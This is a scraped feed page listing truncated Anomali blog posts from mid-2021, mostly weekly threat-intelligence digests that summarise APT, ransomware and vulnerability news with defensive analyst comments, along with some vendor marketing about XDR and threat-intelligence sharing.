What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2021-10-12 17:41:00 | Anomali Cyber Watch: Aerospace and Telecoms Targeted by Iranian MalKamak Group, Cozy Bear Refocuses on Cyberespionage, Wicked Panda is Traced by Malleable C2 Profiles, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Data leak, Ransomware, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Russian Cyberattacks Pose Greater Risk to Governments and Other Insights from Our Annual Report
(published: October 7, 2021)
Approximately 58% of all nation-state attacks observed by Microsoft between July 2020 and June 2021 have been attributed to the Russian-sponsored threat groups, specifically to Cozy Bear (APT29, Nobelium) associated with the Russian Foreign Intelligence Service (SVR). The United States, Ukraine, and the UK were the top three targeted by them. Russian Advanced Persistent Threat (APT) actors increased their effectiveness from a 21% successful compromise rate to a 32% rate comparing year to year. They achieve it by starting an attack with supply-chain compromise, utilizing effective tools such as web shells, and increasing their skills with the cloud environment targeting. Russian APTs are increasingly targeting government agencies for intelligence gathering, which jumped from 3% of their targets a year ago to 53% – largely agencies involved in foreign policy, national security, or defense. Following Russia by the number of APT cyberattacks were North Korea (23%), Iran (11%), and China (8%).
Analyst Comment: As the collection of intrusions for potential disruption operations via critical infrastructure attacks became too risky for Russia, it refocused back to gaining access to and harvesting intelligence. The scale and growing effectiveness of the cyberespionage requires a defence-in-depth approach and tools such as Anomali Match that provide real-time forensics capability to identify potential breaches and known actor attributions.
MITRE ATT&CK: [MITRE ATT&CK] Supply Chain Compromise - T1195 | [MITRE ATT&CK] Server Software Component - T1505 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Brute Force - T1110
Tags: Fancy Bear, APT28, APT29, The Dukes, Strontium, Nobelium, Energetic Bear, Cozy Bear, Government, APT, Russia, SVR, China, North Korea, USA, UK, Ukraine, Iran
Ransomware in the CIS
(published: October 7, 2021)
Many prominent ransomware groups have members located in Russia and the Commonwealth of Independent States (CIS) - and they avoid targeting this region. Still, businesses in the CIS are under the risk of being targeted by dozens of lesser-known ransomware groups. Researchers from Kaspersky Labs have published a report detailing nine business-oriented ransomware trojans that were most active in the CIS in the first half of 2021. These ransomware families are BigBobRoss (TheDMR), Cryakl (CryLock), CryptConsole, Crysis (Dharma), Fonix (XINOF), Limbozar (VoidCrypt), Phobos (Eking), Thanos (Hakbit), and XMRLocker. The oldest, Cryakl, has been around since April 2014, and the newest, XMRLocker, was first detected in August 2020. Most of them were mainly distributed via the cracking of Remote Deskto |
Ransomware Malware Tool Threat Guideline Prediction | APT 41 APT 41 APT 39 APT 29 APT 29 APT 28 | |
|
2021-10-06 15:00:00 | Thanks to Our Employees, Customers, and Partners, We Are Racing Ahead with Cloud XDR Innovations (lien direct) | Anomali is off to the races in this new fiscal year, fueled by our intelligence-driven security that addresses our customers’ differentiated threat detection use cases. We would like to thank our incredible employees who get up every morning to help our customers and partners stop breaches and attackers. Not only are we setting new records for the company, but also meaningfully helping businesses across the world succeed with their XDR framework. We thank our valued customers and partners for entrusting us to help them with their security efficacy and efficiency.
Our business continues to expand across the Fortune 500 and similar enterprise companies across the globe. We are expanding our government business with recent additions like the US Air Force and US Navy and have commenced our investment in building a FedRAMP certification program. We are also expanding our global channel partner program and opening new routes to market. We are particularly excited about our recent partnership with Capgemini, a leading global MDR/XDR provider.
We expect our Cloud open XDR product to be released in early spring. The respective beta program starts in December, and we are very pleased with the tremendous excitement from existing, prospective, and former customers that are going to participate.
At Anomali, we take pride in being the hub of trusted circles for our customers and partners and the fact that we seamlessly integrate with almost everyone in the security ecosystem. We believe that effective security operations start and end with global intelligence. Furthermore, we focus on differentiated use cases built with our customers and partners that enhance both security efficacy and efficiency – making us the Anomali in XDR (see image).
 |
Threat Guideline | ||
|
2021-10-05 18:28:00 | Anomali Cyber Watch: New APT ChamelGang, FoggyWeb, VMWare Vulnerability Exploited and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, FoggyWeb, Google Chrome Bugs, Hydra Malware, NOBELIUM and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Google Just Patched These Two Chrome Zero-day Bugs That Are Under Attack Right Now
(published: October 1, 2021)
Google has warned users of Google Chrome to update to version 94.0.4606.71, due to two new zero-days that are currently being exploited in the wild. This marks the second update in a month due to actively exploited zero-day flaws. The first of these common vulnerabilities and exposures (CVEs), CVE-2021-37975, is a high severity flaw in the V8 JavaScript engine, which has been notoriously difficult to protect and could allow attackers to create malware that is resistant to hardware mitigations.
Analyst Comment: Users and organizations are recommended to regularly check for and apply updates to the software applications they use, especially web browsers that are increasingly used for a variety of tasks. Organizations can leverage the capabilities of Anomali Threatstream to rapidly get information about new CVEs that need to be mitigated through their vulnerability management program.
Tags: CVE-2021-37975, CVE-2021-37976, chrome, zero-day
Hydra Malware Targets Customers of Germany's Second Largest Bank
(published: October 1, 2021)
A new campaign leveraging the Hydra banking trojan has been discovered by researchers. The malware containing an Android application impersonates the legitimate application for Germany's largest bank, Commerzbank. While Hydra has been seen for a number of years, this new campaign incorporates many new features, including abuse of the android accessibility features and permissions which give the application the ability to stay running and hidden with basically full administrator privileges over a victim's phone. It appears to be initially spread via a website that imitates the official Commerzbank website. Once installed it can spread via bulk SMS messages to a user's contacts.
Analyst Comment: Applications, particularly banking applications, should only be installed from trusted and verified sources and reviewed for suspicious permissions they request. Similarly, emails and websites should be verified before using.
Tags: Banking and Finance, EU, Hydra, trojan
New APT ChamelGang Targets Russian Energy, Aviation Orgs
(published: October 1, 2021)
A new Advanced Persistent Threat (APT) group dubbed “ChamelGang” has been identified to be targeting the fuel and energy complex and aviation industry in Russia, exploiting known vulnerabilities like Microsoft Exchange Server’s ProxyShell and leveraging both new and existing malware to compromise networks. Researchers at Positive Technologies have been tracking the group since March 2017, and have observed that they have attacked targets in 10 countries so far. The group has been able to hi |
Ransomware Malware Tool Vulnerability Threat Guideline | Solardwinds Solardwinds APT 27 | |
|
2021-10-04 11:00:00 | The Need for Intelligence-Driven XDR to Address Security Team Challenges (lien direct) | As organizations continue to expand and evolve their digital footprint, security staff struggle to adapt operations quickly enough to ensure effective monitoring and response to incidents in their environment. These challenges are even more difficult due to limited staff and expertise. Enter extended detection and response or XDR. Depending on who you ask, you'll get differing opinions about what XDR is, where it came from, and whether or not you need it. The fact is security teams continue to struggle with too many security tools from different vendors, with little integration of data or relevant threat intelligence. These tools generate an alarming volume of alerts, leading to analysts chasing false positives or not looking into data because they lack the intelligence and expertise to prioritize the alerts that matter. They’re also working in siloed environments, which makes it hard to collaborate and leads to more problems, including: Overwhelming volumes of data make it difficult to prioritize security efforts and response They lack insight into global threats and incidents and are unable to recognize the potential impact of known and unknown threats The detection technologies they’ve installed are riddled with false positives that waste staff time The reliance on a single vendor and the inability to tune security controls across multi-vendor security stacks makes it harder to prioritize investigations and incident response efforts This is where XDR solutions come into play. We’ve aligned ourselves with Gartner’s definition of XDR, which states: "XDR is a security threat detection and incident response tool that natively integrates multiple security products into a cohesive security operations system that unifies all licensed components." In layman's terms: XDR provides a holistic, more straightforward view of threats across an organization's entire technology landscape, providing the real-time information needed to deliver threats to the right people for better, faster outcomes. Security teams can no longer only rely on the same tools they’ve used for threat detection and response. Automation and big data management are needed to collect data across all installed security telemetry, along with advanced intelligence to understand and correlate threats. The improved automation allows teams to sift through the never-ending deluge of data to pinpoint relevant threats and quickly respond to those that matter before they turn into something catastrophic. Anomali’s XDR solution combines our global threat intelligence with extended detection capabilities to stop breaches and attackers. Anomali XDR delivers: Unified threat detection utilizing all installed security telemetry Precision detection with timely alerts to stop threats earlier Increased ROI with less administrative overhead Higher fidelity alerts to reduce false positives and empower stretched IT teams Retrospective search capabilities across 5+ years Take a look at our webinar to learn more about how we can help you Pinpoint Relevant Threats w | Tool Threat Guideline | ||
|
2021-09-30 14:30:00 | The Need for Savvy Sharing of Threat Intelligence (lien direct) | Age of Threat Intelligence Sharing Given the range and sophistication of threat actors, combined with digital transformation and the proliferation of remote devices forming a growing potential attack surface, sharing threat intelligence has become vital. Not to mention, Threat Intelligence Sharing was a key component listed in President Biden’s Executive Order on cybersecurity. A company can no longer operate in a silo when cyber adversaries leverage a full range of tactics across multiple industries. Having a broader picture of these actors and their motivations requires sharing threat intelligence that reduces duplication of effort and response time. Intel Sharing Balancing Act While there are justifiable concerns with sharing threat intel, the benefits to be gained by smartly sharing are compelling enough to navigate legal and security issues. The goal of any cybersecurity program should be to detect potential indicators of compromise (IoCs) as rapidly as possible and perform mitigation before they reach the edges of the network. To quickly detect changes in the cybersecurity landscape, a wide scope of visibility is needed. When a company is actively engaged in sharing threat intel, the relevant information is passed quickly and more well-informed decisions can be made. In addition, analyses for internal stakeholders and intel consumers can be more insightful, relevant, and actionable. Privacy and liability are issues that need to be addressed. Data should be scrubbed for private information or sensitive corporate information before sharing and this should be set up ahead of time for any type of automated data transfer. Legal guidelines such as CISA or EU GDPR can help conform to regulations. Preparing for Information Sharing According to a guide published by NIST, preparation for a sharing program should include the following: Define the goals and objectives of information sharing Identify internal sources of threat information Define the scope of information sharing activities Establish information sharing rules Join a sharing community Plan to provide ongoing support for information sharing activities Starting small will help expand sharing in a safe and relevant manner. Learning to optimize the type of data, how to share it, and with whom to share it helps to create an efficient and cost-effective program. Gaining C-level and management support is essential to obtaining the necessary tools and cooperation that is needed. A cost/benefit analysis will help to convince management that the risks of sharing can be minimized and the upside will not only make the company safer but also save costs. Sharing intel may not only save a company from an expensive breach but can also save costs on the better allocation of resources. For example, metrics may include a decrease of alert events or incidents of getting ahead of an attack due to the sharing of cyber threat intelligence. An Accenture report on the cost of cybercrime found that security intelligence and threat sharing were a top cost-saving measure, saving companies on average $2.26M. What Intel Should be Shared? A good way to get started sharing intelligence is to collaborate and add context to other parties' shared information. This could include observed adversary behaviors, attacks seen, or details of incident response. Historical context can also be quite | Threat Guideline | ||
|
2021-09-29 17:00:00 | Introducing the Anomali Technology Partner Program (TPP) (lien direct) | Delivering a broad spectrum of threat intelligence and security integrations for the Anomali community
Technology partners have always been an integral part of the value proposition that Anomali brings to our customers. From integrating with leading global research vendors to deliver global threat intelligence at scale, to automated delivery of intelligence to security control products for remediation, our broad partner ecosystem is invaluable. Today we’re announcing the Anomali Technology Partner Program (TPP) – a significant investment that will provide technology partners everything they need to develop innovative and differentiated product and service offerings that complement Anomali’s solution portfolio.
Partner Tiers
The program is designed to reward partners who make the biggest commitment to developing value-added solutions that solve customer problems and drive mutual business. The program is structured around the following partner tiers based on the depth of the partnership:
Partners will have the opportunity to get promoted from the Foundation to the Advanced tier as their integrated solutions get deployed in the marketplace. Participation at the Premier tier comes with the most benefits across technical, marketing and sales activities, and is by invitation only.
Criteria for Participation and Partner Tiering
There are many factors to consider when establishing a technology partnership. At Anomali we’re completely focused on customer satisfaction, so we ask that partners have at least one customer requesting the integration, which ensures we’re meeting a need in the marketplace. Below are the primary criteria used for program participation and how Anomali places partners in the three different tiers:
Partner Integration Tracks
One thing that hasn’t changed is the types of integrations that Anomali will deliver via our partner ecosystem. Intelligence sharing is core to everything we do and is critical for successfully stopping attackers and preventing breaches. Below are the three integration tracks available through the program:
Summary
Heterogeneous environments are a reality and customers need solutions that are integrated and drive value out-of-the-box. The Anomali TPP delivers a broad array of specialized threat intelligence and integrations with leading security technology vendors to speed detection, streamline investigations and increase analyst productivity.
Contact techpartners@anomali.com to learn more or apply for program membership. |
Threat Guideline | ||
|
2021-09-14 15:00:00 | Anomali Cyber Watch: Azurescape Cloud Threat, MSHTML 0-Day in The Wild, Confluence Cloud Hacked to Mine Monero, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Android, APT, Confluence, Cloud, MSHTML, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the “anomali cyber watch” tag.
Trending Cyber News and Threat Intelligence
S.O.V.A. – A New Android Banking Trojan with Fowl Intentions
(published: September 10, 2021)
ThreatFabric researchers have discovered a new Android banking trojan called S.O.V.A. The malware is still in the development and testing phase and the threat actor is publicly-advertising S.O.V.A. for trial runs targeting banks to improve its functionality. The trojan’s primary objective is to steal personally identifiable information (PII). This is conducted through overlay attacks, keylogging, man-in-the-middle attacks, and session cookies theft, among others. The malware author is also working on other features such as distributed denial-of-service (DDoS) and ransomware on S.O.V.A.’s project roadmap.
Analyst Comment: Always keep your mobile phone fully patched with the latest security updates. Only use official locations such as the Google Play Store / Apple App Store to obtain your software, and avoid downloading applications, even if they appear legitimate, from third-party stores. Furthermore, always review the permissions an app will request upon installation.
MITRE ATT&CK: [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Man-in-the-Middle - T1557 | [MITRE ATT&CK] Steal Web Session Cookie - T1539 | [MITRE ATT&CK] Network Denial of Service - T1498 | [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Android, Banking trojan, S.O.V.A., Overlay, Keylogging, Cookies, Man-in-the-Middle
Finding Azurescape – Cross-Account Container Takeover in Azure Container Instances
(published: September 9, 2021)
Unit 42 researchers identified and disclosed critical security issues in Microsoft’s Container-as-a-Service (CaaS) offering that is called Azure Container Instances (ACI). A malicious Azure user could have compromised the multitenant Kubernetes clusters hosting ACI, establishing full control over other users' containers. Researchers gave the vulnerability a specific name, Azurescape, highlighting its significance: it the first cross-account container takeover in the public cloud.
Analyst Comment: Azurescape vulnerabilities could have allowed an attacker to execute code on other users' containers, steal customer secrets and images deployed to the platform, and abuse ACI's infrastructure processing power. Microsoft patched ACI shortly after the discl |
Ransomware Spam Malware Tool Vulnerability Threat Guideline | Uber APT 41 APT 15 | |
|
2021-09-07 19:29:00 | Anomali Cyber Watch: FIN7 Using Windows 11 To Spread JavaScript Backdoor, Babuk Source Code Leaked, Feds Warn Of Ransomware Attacks Ahead Of Labor Day and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Babuk, Cryptocurrency, Data breach, FIN7, Proxyware, Ransomware and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Cybercrime Group FIN7 Using Windows 11 Alpha-Themed Docs to Drop Javascript Backdoor
(published: September 3, 2021)
Researchers from the Anomali Threat Research team have identified six Windows 11 themed malicious Word documents, likely being used by the threat actor FIN7 as part of phishing or spearphishing attacks. The documents, dating from late June/early July 2021, contain malicious macros that are used to drop a Javascript backdoor, following TTPs to previous FIN7 campaigns. FIN7 are a prolific Eastern European cybercrime group, believed to be responsible for stealing over 15 million card records in the US alone. Despite several high profile arrests, activity like this illustrates they are more than capable of continuing to target victims.
Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. Therefore, it will be easier to spot unusual traffic and connections to and from your network to potentially identify malicious activity. Furthermore, ensure that your employees are educated about the risks of opening attachments, particularly from unknown senders and any attachment that requests macros be enabled.
MITRE ATT&CK: [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497 | [MITRE ATT&CK] Account Discovery - T1087
Tags: FIN7, phishing, spearphishing, maldoc, Windows 11, carding POS, javascript, backdoor, CIS
Feds Warn of Ransomware Attacks Ahead of Labor Day
(published: September 1, 2021)
The FBI and CISA put out a joint cybersecurity advisory Tuesday noting that ransomware actors often ambush organizations on holidays and weekends when offices are normally closed, making the upcoming three-day weekend a prime opportunity for threat activity. Often during holiday weekends, IT departments are staffed by skeleton crews, limiting their ability to respond and remediate to incidents. Holidays can also present tempting lures for phishing attacks. While the agencies haven' |
Ransomware Malware Tool Vulnerability Threat Guideline | ||
|
2021-08-31 16:40:00 | Anomali Cyber Watch: Ransomware Group Activity, Credential Phishing with Trusted Redirects, F5 BIG-IP Bugs, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Android, Backdoor, FIN8, iPhone, Phishing, Vulnerabilities, and XSS . The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the "Anomali Cyber Watch" tag.
Trending Cyber News and Threat Intelligence
Widespread Credential Phishing Campaign Abuses Open Redirector Links
(published: August 26, 2021)
Microsoft has identified a phishing campaign that utilizes trusted domains combined with domain-generating algorithms and CAPTCHA portals that redirect users to malicious websites. These sites will prompt users to “re-enter” their credentials, scraping the login data. Since the initial domains are trusted, standard measures such as mousing over the link will only show the trusted site, and email filters have been allowing the traffic.
Analyst Comment: Because of the nature of these types of phishing attacks, only reset your password going through the official domain website and not through any emailed links. Be sure to check the URL address if going through a link to verify the site if asked to enter any credential information.
MITRE ATT&CK: [MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Spearphishing Link - T1192 | [MITRE ATT&CK] Domain Trust Discovery - T1482
Tags: Phishing, Microsoft, North America, Anomali Cyber Watch
FIN8 Cybercrime Gang Backdoors US Orgs with New Sardonic Malware
(published: August 25, 2021)
FIN8, the financially-motivated threat group known for targeting retail, restaurant, and healthcare industries, is using a new malware variant with the end goal of stealing payment card data from POS systems. "Sardonic" is a new C++-based backdoor deployed on targets' systems likely via social engineering or spear-phishing. While the malware is still under development, its functionality includes system enumeration, code execution, persistence and DLL-loading capabilities.
Analyst Comment: Ensure that your organization is using good basic cyber security habits. It is important that organizations and their employees use strong passwords that are not easily-guessable and do not use the default administrative passwords provided because of their typically weak security. Update firewalls and antivirus software to ensure that systems can detect breaches or threats as soon as possible to reduce the severity of consequences. Educate employees on the dangers of phishing emails and teach them how to detect malicious emails. It is also recommended to encrypt any sensitive data at rest and in transit |
Ransomware Malware Tool Vulnerability Threat Guideline | ||
|
2021-08-30 14:21:00 | White House Continues to Push for Increased Cybersecurity with Meeting with Tech CEOs (lien direct) | More than two dozen leaders of key groups across a variety of fields met at the White House last week to address escalating cyber threats. This included: CEOs of major tech companies such as Alphabet, Amazon, Apple, IBM, and Microsoft Heads of major financial institutions such as Bank of America and JPMorgan Several energy and water companies will also be included, including the leaders of Duke Energy, PG&E, and Southern Company The leaders of Travelers and the University of Texas system Officials from Duke Energy, Pacific Gas, and Electric, and Southern Company The gathering focused on improving information sharing between government agencies, developing new tools to protect critical infrastructure systems, and creating incentives for businesses to adopt better security practices. While it was originally stressed that there was no specific agenda or list of recommendations coming out of the event and billed as an opportunity for attendees to brainstorm ideas, what came out was much more than originally expected: The White House, big tech firms, cyber insurers, and educational organizations pledged to pour more resources into improving the nation's cybersecurity. A variety of near-term funds and initiatives aimed at improving software supply chain security, expanding the cybersecurity workforce, and improving the cyber hygiene of organizations and the general public were promised by public and private partners. Meeting attendees also promised both free tools and incentives to help individuals and organizations increase their security posture. President Biden has been vocal about his concerns regarding growing cyberthreats since he took office. He warned during his first speech as president. He called it a "cybersecurity emergency" and pledged to work closely with Congress to develop solutions. To prevent future breaches we can't afford not to act. Brainstorming sessions are great, but security leaders need to think outside of the box and not rely on the same old same old. The threat landscape is constantly evolving, but are cybersecurity leaders evolving their approach just as fast? In previous blogs, I've stressed that an optimized threat response requires informed courses of action that can often be acquired through threat intelligence sharing with industry peers. It is clear that secure collaboration is one of the keys to improving the nation's as well as individual organization's cybersecurity defenses. Anomali continues to increase our support for sharing intelligence, providing tools such as Anomali STAXX, a free solution offered that supports sharing indicators through STIX and TAXII. Organizations have long sought to bridge security gaps between technologies and people within their organization. Most enterprises have dozens of cybersecurity tools deployed and access to mass volumes of related information, but they continue to work in silos. By breaking barriers between security information silos and functions, organizations can unify key processes and close significant gaps between detection and response capabilities. But this type of cross-functional collaboration isn’t always easy. It requires trust, transparency, and a shared understanding of business objectives. This way of thinking can also be applied more broadly across the industry. Coming together in brainstorming sessions such as this and pledging resources is a step in the right direction. To learn more about the benefits of sharing threat intelligence, download our whitepaper: The Definitive Guide to Sharing Threat Intelligence | Threat Guideline | ||
|
2021-08-17 17:56:00 | Anomali Cyber Watch: Anomali Cyber Watch: Aggah Using Compromised Websites to Target Businesses Across Asia, eCh0raix Targets Both QNAP and NAS, LockBit 2.0 Targeted Accenture, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: China, Critical Infrastructure, Data Storage, LockBit, Morse Code, Ransomware, and Vulnerabilities. . The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Colonial Pipeline Reports Data Breach After May Ransomware Attack
(published: August 16, 2021)
Colonial Pipeline, the largest fuel pipeline in the United States, is sending notification letters to 5,810 individuals affected by the data breach resulting from the DarkSide ransomware attack. During the incident, which occurred during May this year, DarkSide also stole roughly 100GB of files in about two hours. Right after the attack Colonial Pipeline took certain systems offline, temporarily halted all pipeline operations, and paid $4.4 million worth of cryptocurrency for a decryptor, most of it later recovered by the FBI. The DarkSide ransomware gang abruptly shut down their operation due to increased level of attention from governments, but later resurfaced under new name BlackMatter. Emsisoft CTO Fabian Wosar confirmed that both BlackMatter RSA and Salsa20 implementation including their usage of a custom matrix comes from DarkSide.
Analyst Comment: BlackMatter (ex DarkSide) group added "Oil and Gas industry (pipelines, oil refineries)" to their non-target list, but ransomware remains a significant threat given profitability and the growing number of ransomware threat actors with various levels of recklessness. Double-extortion schemes are adding data exposure to a company's risks. Stopping ransomware affiliates requires defense in depth including: patch management, enhancing your Endpoint Detection and Response (EDR) tools with ThreatStream, the threat intelligence platform (TIP), and utilizing data loss prevention systems (DLP).
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Darkside, BlackMatter, Colonial Pipeline, Oil and Gas, Ransomware, Salsa20, Data Breach, USA
Indra — Hackers Behind Recent Attacks on Iran
(published: August 14, 2021)
Check Point Research discovered that a July 2021 cyber attack against Iranian railway system was committed by Indra, a non-government group. The attackers had access to the targeted networks for a month and then deployed a previously unseen file wiper called Meteor effectively disrupting train service throughout the country. Previous versions of the Indra wiper named Stardust and Comet were seen in Syria, where Indra was attacking oil, airline, and financial sectors at least since 2019.
Analyst Comment: It is concerning that even non-government threat actors can damage a critical infrastructure in a large country. Similar to ransomware protection, with regards to wiper attacks organizations should improve their intrusion detection methods and have a resilient backup system.
MITRE ATT&CK: [MITRE ATT&CK] Data Destruction - T1485 | [MITRE ATT&CK] File Deletion - T1107 | |
Ransomware Data Breach Malware Hack Tool Vulnerability Threat Guideline | APT 27 APT 27 | |
|
2021-08-10 17:39:00 | Anomali Cyber Watch: GIGABYTE Hit By RansomEXX Ransomware, Seniors\' Data Exposed, FatalRat Analysis, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Chinese state hackers, Data leak, Ransomware, RAT, Botnets, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Actively Exploited Bug Bypasses Authentication On Millions Of Routers
(published: August 7, 2021)
The ongoing attacks were discovered by Juniper Threat Labs researchers exploiting recently discovered vulnerability CVE-2021-20090. This is a critical path traversal vulnerability in the web interfaces of routers with Arcadyan firmware that could allow unauthenticated remote attackers to bypass authentication. The total number of devices exposed to attacks likely reaches millions of routers. Researchers identified attacks originating from China and are deploying a variant of Mirai botnet on vulnerable routers.
Analyst Comment: Attackers have continuous and automated routines to look out for publicly accessible vulnerable routers and exploit them as soon as the exploit is made public. To reduce the attack surface, routers management console should only be accessible from specific public IP addresses. Also default password and other security policies should be changed to make it more secure.
Tags: CVE-2021-20090, Mirai, China
Computer Hardware Giant GIGABYTE Hit By RansomEXX Ransomware
(published: August 7, 2021)
The attack occurred late Tuesday night into Wednesday and forced the company to shut down its systems in Taiwan. The incident also affected multiple websites of the company, including its support site and portions of the Taiwanese website. Attackers have threatened to publish 112GB of stolen data which they claim to include documents under NDA (Non Disclosure Agreement) from companies including Intel, AMD, American Megatrends unless a ransom is paid.
Analyst Comment: At this point no official confirmation from GIGABYTE about the attack. Also no clarity yet on potential vulnerabilities or attack vectors used to carry out this attack.
Tags: RansomEXX, Defray, Ransomware, Taiwan
Millions of Senior Citizens' Personal Data Exposed By Misconfiguration
(published: August 6, 2021)
The researchers have discovered a misconfigured Amazon S3 bucket owned by the Senior Advisor website which hosts ratings and reviews for senior care services across the US and Canada. The bucket contained more than one million files and 182 GB of data containing names, emails, phone numbers of senior citizens from North America. This exposed data was not encrypted and did not require a password or login credentials to access.
Analyst Comment: Senior citizens are at high risk of online frauds. Their personal information and context regarding appointments getting leaked can lead to targeted phishing scams.
Tags: Data Leak, Phishing, North America, AWS
|
Malware Vulnerability Threat Guideline | APT 41 APT 41 APT 30 APT 27 APT 23 | |
|
2021-08-03 15:00:00 | Anomali Cyber Watch: LockBit ransomware, Phony Call Centers Lead to Exfiltration and Ransomware, VBA RAT using Double Attack Vectors, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Android malware, APT, Data leak, macOS malware, Phishing, Ransomware and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. 
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
BazaCall: Phony Call Centers Lead to Exfiltration and Ransomware
(published: July 29, 2021)
BazaCall campaigns have forgone malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. Actual humans then provide the callers with step-by-step instructions for installing malware. The BazaLoader payload from these campaigns also gives a remote attacker hands-on-keyboard control on an affected user's device, which allows for a fast network compromise. The lack of obvious malicious elements in the delivery methods could render typical ways of detecting spam and phishing emails ineffective.
Analyst Comment: All users should be informed of the risk phishing poses, and how to safely make use of email. They should take notice that a phone number sent to them can be fraudulent too. In the case of infection, the affected system should be wiped and reformatted, and if at all possible the ransom should not be paid. Implement a backup solution for your users to ease the pain of losing sensitive and important data.
MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Credential Dumping - T1003 | [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: BazaCall, Bazaar, Ransomware
Crimea “Manifesto” Deploys VBA Rat Using Double Attack Vectors
(published: July 29, 2021)
Hossein Jazi has identified a suspicious document named "Манифест". It downloads and executes two templates: one is macro-enabled and the other is an Internet Explorer exploit. While both techniques rely on template injection to drop a full-featured Remote Access Trojan, the IE exploit is an unusual discovery.
Analyst Comment: Files that request content be enabled to properly view the document are often signs of a phishing attack. If such a file is sent to you via a known and trusted sender, that individual should be contacted to verify the authenticity of the attachment prior to opening. Thus, any such file attachment sent by unknown senders should be viewed with the utmost scrutiny, and the attachments should be avoided and properly reported to appropriate personnel.
MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Template Injection - T1221 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] Modify Registry - T1112
Tags: VBA, Russia, RAT, CVE- |
Ransomware Data Breach Spam Malware Threat Guideline | ||
|
2021-07-20 15:00:00 | Anomali Cyber Watch: China Blamed for Microsoft Exchange Attacks, Israeli Cyber Surveillance Companies Help Oppressive Governments, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: China, APT, Espionage, Ransomware, Targeted Campaigns, DLL Side-Loading, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
UK and Allies Accuse China for a Pervasive Pattern of Hacking, Breaching Microsoft Exchange Servers
(published: July 19, 2021)
On July 19th, 2021, the US, the UK, and other global allies jointly accused China in a pattern of aggressive malicious cyber activity. First, they confirmed that Chinese state-backed actors (previously identified under the group name Hafnium) were responsible for gaining access to computer networks around the world via Microsoft Exchange servers. The attacks took place in early 2021, affecting over a quarter of a million servers worldwide. Additionally, APT31 (Judgement Panda) and APT40 (Kryptonite Panda) were attributed to Chinese Ministry of State Security (MSS), The US Department of Justice (DoJ) has indicted four APT40 members, and the Cybersecurity and Infrastructure Security Agency (CISA) shared indicators of compromise of the historic APT40 activity.
